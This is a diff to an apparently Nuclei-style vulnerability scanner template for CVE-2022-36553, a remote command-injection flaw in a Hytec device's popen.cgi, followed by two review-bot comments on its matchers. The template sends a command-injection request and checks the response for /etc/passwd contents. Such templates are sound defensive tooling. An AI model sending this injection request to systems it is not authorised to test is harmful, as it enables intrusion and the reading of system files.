diff --git a/http/cves/2022/CVE-2022-36553.yaml b/http/cves/2022/CVE-2022-36553.yaml
index f8ed639706..070e25fdd6 100644
--- a/http/cves/2022/CVE-2022-36553.yaml
+++ b/http/cves/2022/CVE-2022-36553.yaml
@@ -24,9 +24,14 @@ info:
 tags: cve,cve2022,hytec,rce
 http:
- - method: GET
- path:
- - '{{BaseURL}}/cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912'
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912 HTTP/1.1
+ Host: {{Hostname}}
 payloads:
 command:
@@ -39,7 +44,7 @@ http:
 - type: dsl
 dsl:
 - "regex('root:.*:0:0:', body)"
- - "contains(header, 'lighttpd/1.4.30')"
+ - "contains(body_1, 'index')"
 - "status_code == 200"
 condition: and
@@ -49,5 +54,5 @@ http:
 - "contains(body, 'fonts')"
 - "contains(body, 'extensions')"
 - "status_code == 200"
- - "contains(header, 'lighttpd/1.4.30')"
+ - "contains(body_1, 'index')"
 condition: and
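Review bot: The added `GET /` request has no comment saying why it is there, so a reader of the `raw:` block cannot tell that it exists only to supply `body_1` to the matchers further down. I would add `# request 1: landing page, used only as a product fingerprint (body_1)` above `- raw:`. Because `payloads:` belongs to the same request block, the landing page is presumably fetched again for every `command` value, which adds traffic per target without adding signal; this is worth confirming. The request block continues past the end of the hunk.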
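Review bot: `contains(body_1, 'index')` is a much weaker fingerprint than the banner check it replaces, because the word appears on the landing page of a great many unrelated hosts. The same line is added in the hunk at -49,5, where the other conditions (`fonts`, `extensions`, status 200) are also generic, so that matcher is the more likely one to report false positives. A string specific to the device's landing page would be safer, e.g. `contains(body_1, '<PRODUCT_MARKER>')` with the marker taken from a known device response. With two requests in the block it would also be clearer to pin the remaining conditions to the second response, `regex('root:.*:0:0:', body_2)` and `status_code_2 == 200`, rather than rely on what the unsuffixed names resolve to. The matcher lists start and end outside both hunks.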